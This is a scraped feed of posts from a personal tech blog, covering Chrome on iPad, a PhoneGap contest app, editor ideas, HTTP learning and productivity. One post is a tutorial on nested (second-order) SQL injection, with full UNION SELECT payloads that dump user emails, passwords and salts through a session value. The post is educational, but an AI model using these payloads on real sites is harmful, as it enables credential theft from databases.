observations are with regard to the iPad version of the browser.\nWhy I love Chrome\nChrome is already my primary browser on my primary machine, and after it came out for the iOS, I tried it out hesitantly, but to my surprise (contrary to what the internet says) it is working out even better than expected.\nAbility to sync tabs across my laptop and tablet. I can leave my laptop and continue reading on the go. I don’t own a Mac, so I can’t comment against how Safari\u002FiCloud does it, but it works well enough for me.\nAll my desktop bookmarks (and bookmarklets) are available and functioning instantly.\nOmnibox is awesome, and saves me a lot of trouble, looking in my history, bookmarks, and pre-fetching stuff. This was the most important feature that Chrome v1 brought along with it (when it was released in Windows), and its nice to find it work exactly as indended.\nIncognito Mode (I previously used Dolphin in private mode, but this is far better).\nComplete bookmark listing while creating a new bookmark. Unlike Desktop version of Chrome, which only shows 5 most recently used folders. I bookmark stuff extensively, and it makes the process much easier for me than on the desktop version, ironically. See Image for Comparision\nTab Switching is brilliant. It seems to be inspired\u002Fcopied straight from Paper, but it is executed well enough for me. It gets better once you get used to it. The tag bar itself is scrollable as a plus (you can hide\u002Funhide tabs). I’ve read people complaining about this, but it helps me browse on the ipad one-handed.\nIt feels fast, especially after continous use. I don’t know if its the ported networking stack, or better caching, but page load speeds are better than Safari for me in general.\nNote: If you have a jailbroken device, you can setup Chrome as your default browser using BrowserChooser from Cydia. The best part is that home-screen shortcuts open in Chrome as well.  I’ve ditched Facebook App for a shortcut icon to touch.facebook.com as a result.\nThings I want\nSupport for configurable search engines. I use them extensively (for eg duckduckgo, google lucky search, amazon, ebay, github, stackoverflow and even google mobile search). The pre-defined search engines are of no use to me (Bing\u002FYahoo\u002FGuruji).\nFind in Page. This is a no-brainer. Edit: This is available via Chrome Customizer in Cydia for a jailbroken device.\nAbility to turn off images\u002Fjavascript) (Content Settings). I’m not sure if it will be possible w\u002Fo proxying like how Opera does, but this would be nice to have (since people might want to save bandwidth on 3g).\nSupport for emailing an entire page (rendered).\nUserScript support. I don’t know if apple would allow it at all, but I think the Apple ToS disallows code to be downloaded. What if there were some sort of linking support to allow me to insert some external script tag?\nReadability\u002FiReader like support. The safari readability link does work wonders. This could be simulated with a bookmarklet, but once again calling them is hard. Update: ChromeCustomizer can do this via settings menu (see below).\nBetter access to bookmarks\u002Fbookmarklets. At least show me the mobile bookmarks so I can keep them separate.\nWait a bit more before taking the page snapshot for the speed-dial. The GMail snapshot has always been blank for me. At least check if the snapshot is completely blank, and wait a bit more if that is the case.\nApp shortcuts. The kind like you get for almost all websites on Chrome Webstore. I think they are referred to as “Chrome Apps” against “Extensions”, which would be completely disallowed as per Apple ToS. Since Apps are just shortcuts and some icons, they should be allowed in some manner.\nBetter history support. Seeing just the last 6 closed tabs kind of sucks. Give me some real history browser (and improve the one in desktop chrome while you’re at it).\nMailto support (for gmail etc). Don’t know if possible, but would be nice to have.\nSelection Mailing. Just let me select and mail some html.\nHandle pdfs better. By default chrome redirects to Safari for pdfs. After changing Chrome to default, it does handle pdfs fine, but I miss the “Open In iBooks” link. Don’t see this happening though. (Update: This was fixed in a Chrome Update)\nWebintents support would be nice to have (via something other than chrome Webstore, I Guess)\nCloudPrint support. I don’t use this, but I am assuming there are people who do.\nFullScreen support of some sort. Safari in iOS 6 is bringing this much asked for feature, so there are people who would love to have this. Chrome’s faster tab switching should help it out with some of the Full Screen issues. (Edit: This is available via a three finger tap if you install Chromizer from Cydia’s ModMyi repo). Chromizer also forces the iPhone style tab switching on the iPad as a side-effect.\nThere is also a ChromeURL tweak available for Jailbroken devices that changes the keyboard layout to the the one used for address bar in Safari (So called tld keyboard).\nAnother one called ChromeCustomizer offers the following:\nAdd one bookmarklet to the settings menu. I’m using Readable at present.\nAdds a broken fullscreen implementation (maybe it is clashing with Chromizer) via the Menu. I prefer Chromizer’s 3 finger tap for fullscreen.\nAdds a Find in Page feature. Update: This is now available\nAdds some filtering for ads\u002Ftracking websites.\nAdds an option to change Chrome tab switching mode (iPhone vs iPad).\nSee this blog post for some more tweaks available on cydia.",[],{"slug":2990,"title":2991,"link":2992,"pubDate":2993,"contentSnippet":2994,"tags":2995,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"nested-sql-injections","Nested SQL Injections","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2012\u002F06\u002F09\u002Fnested-sql-injections\u002F","2012-06-09T00:00:00.000Z","I recently did something along this line, and this technique is really cool. (I prefer to call it “inception” injection). Its pretty easy once you figure it out, so here it goes.\nIf the result of the first query is used as an input in the second query, and the first query is vulnerable, we can use the output as a “input variable” into the second query itself. This would be useful in places where the second query has a better display method than the first one (for instance length restrictions).\nQuery 1:\nSELECT * FROM users WHERE email='$email' AND password = '$pass'\n\n\nThis query is usually accompanied with:\n\u003C?php\n$_SESSION['email'] = $row['username'];\n\n\nQuery 2:\nAssuming something like a profile page:\nSELECT * FROM user_details WHERE email='{$_SESSION['email']}'\n\n\n#Injection\nInjecting the first query (basic)\nSELECT * FROM users WHERE email='user@email.com' # AND password=''\n\n\nEverything after # should be treated as a comment. Hence forward, I would not write stuff after # for brevity.\nThinking backwards, we could create a custom query for user_details:\nSELECT * FROM user_details WHERE email='' UNION SELECT * FROM user_details #\n\n\nThis would show the details of the first user in the profile page. Let’s think a bit larger:\nSELECT * FROM user_details WHERE email='' UNION SELECT GROUP_CONCAT(email), GROUP_CONCAT(password) FROM user_details #\n\n\nUsually, this won’t work (different number of columns in results). You’d have to use ORDER BY to guess the number of columns. Writing only the UNION part now:\nUNION SELECT * FROM user_details ORDER BY 1 #\nUNION SELECT * FROM user_details ORDER BY 2 #\nUNION SELECT * FROM user_details ORDER BY 3 #\nUNION SELECT * FROM user_details ORDER BY 4 # -- Gives Error\n\n\nSo we realize that user_details has 3 columns. Coming back, we could do:\nUNION SELECT GROUP_CONCAT(email), GROUP_CONCAT(password), 3 FROM users #\n\n\nThat would give us details upto 1000 characters (GROUP_CONCAT limits). To mitigate those limits:\nUNION SELECT GROUP_CONCAT(email),GROUP_CONCAT(password),GROUP_CONCAT(salt) FROM (SELECT email,password,salt FROM users LIMIT 50 OFFSET 0)\n\n\nChange the OFFSET and you’re ready to roll.\nInception Injection\nThis was all a theoritical attack on the second query. Granted you could do lots of stuff from here on the first query, but it is far less responsive (Doesn’t give much output). The only thing you can modify is the email, which offers you a single field.\nHowever, the only attack vector ($_SESSION) for the second query is not directly controlled, but comes instead from the result of the first query. So to perform this attack on the second query, we take the second injection, and use it inside the first one.\nSELECT * FROM users WHERE email='' UNION SELECT * FROM users # -- will give us first user\nSELECT * FROM users WHERE email='' UNION SELECT * FROM users  ORDER BY 1 # -- keep increasing to get number of columns\nSELECT * FROM users WHERE email='' UNION SELECT 1,2,3 FROM users # -- This would let us know which column corresponds to the email id\nSELECT * FROM users WHERE email='' UNION SELECT \"\u003Cinject second query here>\",2,3 FROM users # -- This would let us know which column corresponds to the email id\n\n\nAlthough we have been writing injection code starting with UNION, it actually would start with ‘ UNION… Using our last injection code for the second query here, it becomes:\nSELECT * FROM users WHERE email='' UNION SELECT \"' UNION SELECT GROUP_CONCAT(email),GROUP_CONCAT(password),GROUP_CONCAT(salt) FROM (SELECT email,password,salt FROM users LIMIT 50 OFFSET 0) #\",2,3 FROM users #\n\n\nWhat happens on the server side:\n\u003C?php\n\t$_SESSION['email'] = \"' UNION SELECT GROUP_CONCAT(email),GROUP_CONCAT(password),GROUP_CONCAT(salt) FROM (SELECT email,password,salt FROM users LIMIT 50 OFFSET 0) #\"\n\n\nand the second query becomes:\nSELECT * FROM user_details WHERE email='' UNION SELECT GROUP_CONCAT(email),GROUP_CONCAT(password),GROUP_CONCAT(salt) FROM (SELECT email,password,salt FROM users LIMIT 50 OFFSET 0) #\n\n\nNote that we still have to keep a # at the end of the inner query. There are portions after # which we still need to discard. Feel free to contact me if you have any further doubts. I am sure this is a well-known and used by people already, but this was something new to me.",[],{"slug":2997,"title":2998,"link":2999,"pubDate":3000,"contentSnippet":3001,"tags":3002,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"phonegap-blog-post","Akira - Winning entry to the Adobe Express Apps Contest","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2012\u002F05\u002F23\u002Fphonegap-blog-post\u002F","2012-05-23T00:00:00.000Z","This is the obligatory blog post that comes along with winning the Adobe Express Apps Contest.\nContest Rules\nThe contest rules asked you to develop a mobile application, using Adobe Phonegap and related technologies(read Dreamweaver) in a time frame of hardly 18 hours. This duration was assuming that one does no sleep, which I did not.\nThe problem statement for the application was to create a mobile application for a SUV car manufacturer. The application had to be socially engaging and use the hardware capabilities offered by the device.\nOur Interpretation\nWe started with the problem statement as the complete guide for our application and ought bottom up for an application that would be the least and best amount of work to create an app that fulfils the app requirements.\nWe started off with a few wireframes, and features thrown around. At the end of the one hour mark, we had our feature list down to :\nOwners can share pics of their cars. We wanted the application to be for the owners of the cars, which brings in a lot of additional data. Pic sharing was the most logical thing to do. We were thinking something like an Instagram Community where everybody posts pics about where they have been, their rigs and so on.\nA mileage meter. This was a slight gamification of the GPS data that we get. At the start of every journey\u002Ftrip, you could mark it as such in the app, and we would record your position every 5 minutes. At the end of the trip, you could mark your ending point and see how much you travelled. Also important was the fact that we decided to show a number corresponding to every application user, showing how many miles he\u002Fshe has travelled so far. Seeing that the next guy has travelled only so and so more miles than you may lead you to travel more.\nMaps, obviously. A map for all the previous journeys that you have taken.\nWork\nWe tried to start with JQ.Mobi, which is an alternative to Jquery Mobile, but could not justify it, and switched to JQuery Mobile as it offered better  integration with Dreamweaver.\nThe basic application layout was done using a mix of JQuery Mobile and some custom css. I came across a very good service called Build Phonegap, that allows you to compile your Phonegap application online to different platforms. We started with basing our application on the Phonegap Starter App on GitHub which was quite good. The examples directory in the phonegap download is what we ended up using, though.\nEdit: After working a lot more in mobile development, I have come to see a lot more frameworks, and find JQTouch to be quite the minimalist do-one-thing-well plugin.\nThe most difficult part was to get the application to compile for iOS, without paying the Apple Developer Licence. Since, I could not see myself selling iOS apps anytime soon in the Apple App Store, I was stuck with a jailbroken iPad + iPod Touch, and had to figure out out to compile.\nThe steps, which took me a lot of time to find on the internet, include :\nDownload and install the XCode and the Adobe Phonegap toolkit. I downloaded the latest version, 4.2 for xcode, which makes the process a bit easier.\nFollow the instructions on this youtube video to allow xcode to compile your application without Code Signing.\nCreate a corvora application in xcode and follow these instructions to add the www folder to the application.\nCompile. If you have an iDevice connected, you should be able to compile and install your application in a single step.\nYou may need to change your application configuration to “Do not code sign” for this to work.\nGetting all the above steps to work for the first time, on a borrowed MacBook Pro was a lot of work, for a mac noob like me. But at the end, getting to see the application getting launched on multiple devices and looking equally good was worth it.\nThe rest of the time was spent on getting the application features to work, while fighting off sleep. The end result was a still-incomplete application , which ran on multiple devices.\nBlackberry\nUnfortunately, we were not able to run the app on the only Blackberry Phone that we had as Phonegap only supports Blackberry 5 as of now, while our phone had been upgraded to 6.\nOur winning strategy from the start had been to dazzle the judges with an application running across multiple devices, and working equally good. We were pretty sure that none of the other contestants would put in so much effort to get it to run on non-android devices.\nBackend\nI wrote the application backend in PHP limonade, a framework that i am quite used to. The concept was to give out a rest api to the application to use to Authenticate users and carry out backend tasks.\nCode\nThe code is obviously messy, as a result of being hacked in on a single 18 hour marathon. You may be able to get a few good ideas from the implementations, though. The entire code is available at my akira and akira-backend repositories.\nThoughts on Phonegap\nMy second slide in the presentation I did for the contest(made on Keynote on the Ipad, while walking to the contest room) says proudly “Phonegap is awesome”. And i seriously mean that. I’ve got started in the world of mobile development, while not having to worry about cross browser compatibility issues, and the like. I can do stuff easily using the already existing technologies that I know and love. There are a ton of excellent Phonegap plugins out there, and many more being written right now.\nI am really impressed with what a web developer could do with Phonegap, and its ease of use. The Adobe Developers promised me that the integration would be far better in Dreamweaver 6, which I might just try. Although, it was far easier for me to compile and install the application on an android phone, so I hardly used the emulator which I took the pains to install.\nExpectations\nWhat I’d really love, though is a Phonegap simulator. Instead of having to install an android emulator, what if Dreamweaver comes with a Phonegap simulator. Since Phonegap is all javascript, it should be trivial to create basic UIs that look and feel like the native interface of the OS chosen. I would still have to do final tests on the emulator, which i believe are worthless, compared to running it on actual devices. My point is, installing the android emulator and getting the app to run in a emulator is really no big deal, but turns out be a huge time consuming step. For interested web developers, this could be skipped pretty easily, if only Phonegap had its own simulator.\nThis is all just theory, as you’d have to install the complete Android and ios sdk to compile it for your device, anyway. But it would be a welcome step.\nPresentation\nThe presentation was made as a string of screenshots developing the application, so its not really much help. But here it is anyway. View Original.\n\n\nPrize\nI won a PS3. Yay!\nIf you have any problems with the code, or the process, feel free to reach out.",[],{"slug":3004,"title":3005,"link":3006,"pubDate":3007,"contentSnippet":3008,"tags":3009,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"sympathy-editor","Sympathy: My vision of a code editor","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2012\u002F05\u002F20\u002Fsympathy-editor\u002F","2012-05-20T00:00:00.000Z","Update: I have worked on an editor protype along the lines of this blog post. The result is called Sympathy Editor. Please check it out.\n\nI’ve used more than a dozen of editors for mainly two purposes: coding, and writing text. The most liked and used among them would be [Notepad++][http:\u002F\u002Fnotepadplusplus.org\u002F] and [Geany][http:\u002F\u002Fgeany.org\u002F]. I’m also a vim user, and primarily a web developer. I’ve always liked simple tools that do one thing well, as per the unix philosophy.\nThe era of WYSIWYG editors in web development is long past. I’m yet to hear someone suggest Dreamweaver as a serious editor. If you were to go out in the Rails world, you’d mostly be met by vim\u002Femacs\u002Ftextmate fans. As a linux user, I use geany for most of my editing work, including blog posts, like this one (Markdown is hands down, the best thing to happen to word-processing).\nBrowser meet Editor meet Terminal\nThere were a few attempts at creating code editors (I don’t like the term IDE) powered by the gecko engine some time back. None of them materialized to anything special. Today, a normal workflow for me involves 3 open applications - a browser (chromium), a terminal window, and a text-editor.\nAnd I’d alt-tab all the way to hell on them.\nAt this stage, almost everyone will tell me, there is no problem with this workflow. This is exactly how it is supposed to work. But we are not in the 1990s when browsers were just another application. At any given time, I usually have multiple stackoverflow tabs open in the browser pertaining to the code I am writing.\nOn the other hand we have a terminal, which I usually use to run builds, compile, and do version control stuff. No amount of integrated IDE magic will make me move away from the beloved command line (as it should be).\nThe easiest solution is to get a second monitor. And yes, I love using dual monitors. But I’m still not satisfied. I want something more. I have 3 core applications, but using 3 monitors is an extremely costly venture. So I’m stuck to running a text editor, and alt tabbing my way between Chromium and Gnome Terminal.\nCloud IDEs\nOne of the solutions that keeps popping up are the almighty cloud based IDEs (like c9.io), which I really like. But the experience is sub-par at best.\nAnother cool project called sky-edit involves an extension in mozilla, which enables one to edit any text file in the browser itself, by pointing it to “edit:” urls. This is closer to what my ultimate aim is: “text editor in a browser, editing local files”.\nWorkflow\nWhat I’d want my workflow to be is point my browser to a text file, edit it in place, change the tab to the live site, and then refresh. Once I realize I have to restart apache, I’d just change my tab to the terminal one, and do my cli stuff there itself.\nShortcuts:\nCtrl+T: New browser tab\nCtrl+E: New editor tab\nCtrl+Y: New Terminal tab\nCtrl+S: Save a file\nAll file:\u002F\u002F urls are browsable as usual, and all text files become editable. Just think of all the possibilities. As long as it uses plain old javascript\u002Fcss, it could re-use most of the editing part from the excellent ace project. Even codemirror would work brilliantly.\nAnd the best part is that it is still a complete browser. Meaning you get to use all your bookmarks, bookmarklets, plugins, and fancy stuff that you expect in a browser.\nIntegration\nJust think of the possibilities! Since this is just another browser, you can build extensions that target edit windows. Meaning an extension could add support for auto-completion very easily. And repeat for inline documentation browsing.\nA build shortcut could probably be used to switch to a running version of the website in some way. What about other stuff? Like spell-checking? Browsers support that. Even dictation would probably work.\nAnd markdown editing! Hell yeah!. Edit it all in your browser itself, while keeping github open in another tab.\nStart\nThis is a simple propsal of sorts, to get a few recommendations about how this should proceed. I asked a similar question on the askubuntu forums, which made me realize what the real problems were. I’m trying to build chromium and get something off the ground. The project is tentatively titled sympathy and has zero code as of now.\nI tried to earlier write something similar in python, but realized that I could not build an awesome feature complete text-editor by myself. Which made me shift to forking something like geany. I then realized that getting the webview in geany to be feature-complete as a browser would be again heavily demanding.\nThe easiest path out is to build the editor in the browser. Why? Because there has already been a lot of work done in this direction, including ace, bespin, codemirror and lots of other editors. Embedding the terminal is another problem, which will be harder to solve in the browser, but I’m willing to give it a try.\nAs such, my plan is to fork chromium, and work on adding support for text-file editing in the browser. There are a few questions I’d like to answer over time, such as should the browser be stripped? Chromium is a heavy project, and includes some complex features baked right in, which are definately not needed in a text-editor. For instance “Cloud Print”, “Chrome Sync” etc. But at the same time, there is a reason to keep it in as well. I’d like to use this as my primary browser, using all the extensions, bookmarks, and sync features it offers me.\nSounds interesting? I’ve got no idea on how to approach this. Help me out. If you do not like facebook comments, please discuss this on Hacker News, or feel free to drop me a mail.\nUpdate\nI did try my best on developing such a thing, and the end result (still far from finished) is Sympathy Editor. Try out the beta. Hopefully you will like it.",[],{"slug":3011,"title":3012,"link":3013,"pubDate":3014,"contentSnippet":3015,"tags":3016,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"new-design-captnemo-in","New Design of CaptNemo.in","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2012\u002F03\u002F31\u002Fnew-design-captnemo-in\u002F","2012-03-31T00:00:00.000Z","I did a redesign of the blog. The main goals for the redesign were to reach a\nclean, readable layout, which I feel I’ve accomplished.\nOld Design\nEverything was plain old bootstrap, except for the hover effect on the\nphotograph. I’ve also removed the old “Related Posts” feature, which I felt was\nnot at all useful. In the old homepage, the list of articles was earlier presented as a list (\u003Cli>), while it is now slightly better. The topbar has also been removed, instead focussing on a far better sidebar.\nNew Stuff\nI wanted a clean design more than anything. So instead of the sharebox being persistent on every device, I decided to hide it on lower resolutions. It currently hides if the screen width \u003C 1100px, so unless you are on a widescreen resolution monitor and using your browser on fullscreen, you won’t see it.\nResponsive design via bootstrap allows you to easily support mobile devices. The left sidebar is stacked, so that even mobile devices have no problem with the layout.\nI’d describe the design as clean, minimal.\nBootstrap\nThe earlier design was using Bootstrap 1.3, and I’ve upgraded to 2.0.2 now.\nI’ve used the new version before, but with zero changes using\nbootswatch in a few other places. But\nthis time, I decided to tweak bootstrap for my needs.\nI did away with the navigation bar, and changed the default fonts. The site\ndoes not feel like a stock bootstrap site any longer. The major contribution\nfrom bootstrap, was in fact the grid system, and the responsiveness, which\nreally helped me get it done quickly.\nTypography\nThe fonts used are Ubuntu for the content, and Gentium Book\nBasic for the\nheadings. I’m using Google Web Fonts\nDirectory for the fonts.\nI’m only loading the italicized version of Gentium as I’ve chosen to display\nall headings (h1-h6) as italics.",[],{"slug":3018,"title":3019,"link":3020,"pubDate":3021,"contentSnippet":3022,"tags":3023,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"hollywood-what-can-we-learn","What can we learn from Hollywood","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2012\u002F03\u002F22\u002Fhollywood-what-can-we-learn\u002F","2012-03-22T00:00:00.000Z","There is Lot of buzz in the startup industry regarding the killing of Hollywood. However, before we do that (Amen), there is something that I wish to learn from it.\nHollywood ships.\nNo matter how much we shout at their broken distribution model, there is one thing that I deeply admire about hollywood. It gets shit done. On time. Again and again.\nWhy is this important? Because it is One of the largest industries I see around that stick to deadlines on a regular basis. This is something deeply missing in the tech world.\nWhen the trailers of a movie tell me that it will be out in summers, I know I can keep a block reserved for when it will come out. Quite unlike Microsoft, which may push back its release dates as often as it wants.\nBut I thought the Tech industry was done with this deadline bullshit?\nYes, I too despise deadlines and can’t wait for them to get away, but this article is about something else. This is much more about the undying spirit of Hollywood to release stuff.\nSo each time you are facing feature creep, and it looks like it will never ship, just look at Hollywood and get it done.",[],{"slug":3025,"title":3026,"link":3027,"pubDate":3028,"contentSnippet":3029,"tags":3030,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"planet-iitr-update","Planet IITR Update","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2012\u002F03\u002F13\u002Fplanet-iitr-update\u002F","2012-03-13T00:00:00.000Z","So, I was just going through my old blog posts, and saw the Planet IITR Update, which I created out of a need for people to be able to find blogs from other people in IITR.\nSince no one has ever submitted a single link to the planet , I just thought, why shouldn’t I just crawl all my Facebook friends from IIT-R, and check their website URLs. The Facebook part took ~20 minutes (getting list of users from my 2 friendlists, followed by getting the website url for each of those friends). After that came the link checking part, which tool ~15-20 minutes as well. A list of all the websites (very few people fill up that that field on fb) I found during the search is here (just 39).\nAfter updating the planet, I had to update the spreadsheet as well. And here’s a list of the blogs, just in case.\n\n\nIn case someone is interested in taking over maintenance (meaning link curation) for Planet, please contact me at capt.n3m0@gmail.com, and I’ll be glad to share the authentication details with you.\nLink to Planet : Planet IIT-R\nIn case you were wondering what this planet stuff is all about, it allows one to add a single curated feed to one’s feed reader and get all updates via that. So planet iitr is a curated collection of blogs pertaining to IIT-R.",[],{"slug":3032,"title":3033,"link":3034,"pubDate":3035,"contentSnippet":3036,"tags":3037,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"why-learn-http","Why you should learn HTTP?","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2012\u002F03\u002F05\u002Fwhy-learn-http\u002F","2012-03-05T00:00:00.000Z","I see people learning RoR, PHP, Django, with a single intent: getting their own website. Of course, it is the million dollar idea that will blow everyone away, as always. But what I find fascinating is that too many upcoming web developers are testing the waters with opinionated coding frameworks. The entry barrier for software development has been lowered exponentially in the last decade, leading to a slew of web frameworks, tutorials, and screencasts. Today is arguably the best time to be involved in software development. Lots of people are learning to code their first web-site with rails, or django. There are lots of benifits with this approach: as a beginner, you are kept isolate from all the complexities, and can focus more easily on your application.\nBut, it also leads to shallow learning. You could have written a dozen sinatra apps, and still not understand how it all works. And as it stands, it is not essential to learn it. You can easily develop entire websites thinking only in terms of urls, hyperlinks, routes and controllers. This is all good for starting up, when you don’t wanna deal with the complexity of it all, but I’d expect any competent web-developer to understand HTTP.\nYou see, HTTP is the foundation for all of web. It is how the internet tubes work. Learning HTTP is uncovering the hidden layer behind your browser. It is understanding how cookies, and sessions work in PHP; how xsrf attacks happen and mitigating against them; the magic that rails does when it creates objects from the submitted form parameters transparently for you. And the best part is that its not all that difficult to learn at all.\nThere was a lot of debate concerning REST recently. I don’t claim to understand REST fully. I’m yet to meet someone who does. But I can comfortably build RESTish APIs, and consume them with ease without breaking a sweat. And smile at the fact that its all just HTTP. You cannot move to REST, HATEOAS unless you are comfortable with HTTP.\nSo, if you are a beginner in web-development, here’s my advice to you: Understand HTTP. A few pointers:\nRead a good book on HTTP.\nRead the HTTP RFC.\nWikibooks and Wikipedia entries on HTTP are quite good.\nUse the network tab in Webkit Inspector\u002FFirebug. And understand each of the damn headers.\nStart using curl -i, if you don’t already\nAbove all, be curious\nQuestion the web.",[],{"slug":3039,"title":3040,"link":3041,"pubDate":3042,"contentSnippet":3043,"tags":3044,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"shift-to-bundler-1-1","Shift to bundler 1.1 (Ruby)","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2012\u002F02\u002F23\u002Fshift-to-bundler-1.1\u002F","2012-02-23T00:00:00.000Z","In case someone out there is still stuck with bundler 1.0, and hates seeing the Fetching source index for http:\u002F\u002Frubygems.org\u002F. screen, please update to bundler 1.1.\nThe following command should do the trick:\n\ngem install bundler --pre\n\n\nBundler 1.1 is faster by a huge margin in comparision to 1.0.\nReferences\nhttp:\u002F\u002Fpatshaughnessy.net\u002F2011\u002F10\u002F14\u002Fwhy-bundler-1-1-will-be-much-faster\nhttp:\u002F\u002Frobots.thoughtbot.com\u002Fpost\u002F2729333530\u002Ffetching-source-index-for-http-rubygems-org",[],{"slug":3046,"title":3047,"link":3048,"pubDate":3049,"contentSnippet":3050,"tags":3051,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"make-post-request-with-requests-node-js","Making post requests with 'request' module in node.js","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2012\u002F02\u002F22\u002Fmake-post-request-with-requests-node.js\u002F","2012-02-22T00:00:00.000Z","Was stuck at this for quite some time:\nvar postData={\n\ta:1,\n\tb:2\n};\nrequire('request').post({\n\turi:\"http:\u002F\u002Fexample.com\u002Ftest\",\n\theaders:{'content-type': 'application\u002Fx-www-form-urlencoded'},\n\tbody:require('querystring').stringify(postData)\n\t},function(err,res,body){\n\t\tconsole.log(body);\n\t\tconsole.log(res.statusCode);\n});\n\n\nThis will make a post request to http:\u002F\u002Fexample.com\u002Ftest with the querystring parameters in postData. Meaning if you are using PHP, you can see the variables in $_POST instead of parsing request body.\nReferences:\nhttps:\u002F\u002Fgist.github.com\u002F1360979\nhttps:\u002F\u002Fgithub.com\u002Fmikeal\u002Frequest",[],{"slug":3053,"title":3054,"link":3055,"pubDate":3056,"contentSnippet":3057,"tags":3058,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"the-only-way-i-can-work","The only way I can work any longer","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2012\u002F02\u002F18\u002Fthe-only-way-i-can-work\u002F","2012-02-18T00:00:00.000Z","Being a good programmer is 3% talent and 97% not getting distracted by the Internet.\nFirstly, a frank admission.\nI procastinate.\nFor every second I spend in front of my computer, trying to get some work done, there is a continous struggle going on between my “work” and “play” side of things. Unfortunately, the “play” side seems to be winning. A lot. So I decided to wage a war against it.\nHere is my arsenal of tools:\nget-shit-done - Script blocks all access to various sites(FB,reddit etc)\nChrome Profiles - One of my profiles is called “get-shit-done”. It features my development extensions, apps, bookmarks, and nothing else. It is plain vanilla Chromium with no puffy unicorns luring me to check my Facebook Notifications.\n\n  \nMusic - I find Youtube a surprising good source of music discovery. I listen to almost everything. Recently, I’ve started to listen to Ludovico Einaudi. You may also like http:\u002F\u002Fmusicforprogramming.net\u002F in this regard.\nMinimal Tabs - I close a tab as soon as I’m done with it. This leads to ~3-5 tabs in my “get-shit-done” setup. A lesser number of tabs usually means a limit on the number of distracting links. Even Stackoverflow doesn’t help in this regard.\nThe get-shit-done profile even has settings to clear cache at closings. This leads to me being signed out of everything. Including GMail, Facebook, SO, and everything else. In this mode, I login to something, if it is essential to the work at hand.\nRead It Later - I’ve setup all Hacker News feeds above 20 points to be saved automatically to my Read It Later account, which I can easily consume on my iPad at my leisure. However, I find myself itching to browse hckrnews every 5 minutes.\nIf you find yourself browsing facebook, reddit, youtube, hacker news, or reading blog posts on productivity, I urge you strongly to try this out. Defeating procastination is not easy. And its never a win-or-lose battle. What are your thoughts? How do you stop yourself from getting lost on the internetz? Tell me in comments.",[],{"slug":3060,"title":3061,"link":3062,"pubDate":3063,"contentSnippet":3064,"tags":3065,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"on-github-1","Things I love about Github","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2012\u002F02\u002F02\u002Fon-github\u002F","2012-02-02T00:00:00.000Z","A slide from GitHub’s famous “How Github uses Github to build Github talk”:\n\n\nIn their recent version of the talk at RubyConf 2011, they changed the slide slightly:\n\nIt now reads, “No Pings” instead of “No Managers”.\nNot nitpicking, just paying attention.\nIf you haven’t seen the talk (or just saw the slideshow), you should go and watch the talk (31 mins) Right Now",[],{"slug":3067,"title":3068,"link":3069,"pubDate":3070,"contentSnippet":3071,"tags":3072,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"facebook-choose-group-vs-page","Choose Between Facebook Groups and Pages","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2012\u002F01\u002F26\u002Ffacebook-choose-group-vs-page\u002F","2012-01-26T00:00:00.000Z","I don’t know how many times I’ve said this, but the best way of creating a multi-user discussion platform is to create a facebook page. A little guidelines on what you should use:\nCreate a group when you really need it (for \u003C100 people) and when you want to have close knit discussions. (People get notifications for each post on the group) -> Leads to spamming\nNever create a fake profile for an organization\u002Fevent\u002Fcelebrity\u002Fanything that is not you. Creating fake profiles is actually against Facebook’s TOS, and can lead to account discontinuation. Plus the barrier of friending a person (instead of “liking it) is higher enough to lead to lesser number of followers.\nCreate a Facebook Page for every other case. If you are a brand\u002Fnews\u002Fstartup\u002Forganization (public facing). This is usually the best choice, and it gives you the best outreach of all. (Especially if you want to reach out to People).\nIn short, just create a Page, unless you know what you are doing.",[],{"slug":3074,"title":3075,"link":3076,"pubDate":3077,"contentSnippet":3078,"tags":3079,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"google-plus-api-fixit","Google, Fix your Google+ API","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2011\u002F12\u002F06\u002Fgoogle-plus-api-fixit\u002F","2011-12-06T00:00:00.000Z","Dear Google,\nPlease release the Google+ write API as well. In case you’ve forgotten, its been 6 months since you launched. I’ve got stuff I wanna post, stuff I wanna develop. Please keep to your promises, and don’t make me quote Steve Yegge.\nAlso, while you are at it, please fix this issue and make the list of +1d url’s available.\nThanks,\nA frustrated developer and Google+ user.",[],{"slug":3081,"title":3082,"link":3083,"pubDate":3084,"contentSnippet":3085,"tags":3086,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"someone-jailbreak-my-ipad","Someone jailbreak my iPad","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2011\u002F12\u002F05\u002Fsomeone-jailbreak-my-ipad\u002F","2011-12-05T00:00:00.000Z","This is a rant, mainly targeted at Apple. If you are a Apple fanboi, just go elsewhere\nPlease, and quickly. I can’t take another minute of this iTunes. It refuses to properly sync songs, does not update my songs tag info, unless I play them individually, and to top it all, my iPad gives out incorrect usage information about my apps. I tried adding them up, and it seems the total is way off. And since everything in thr 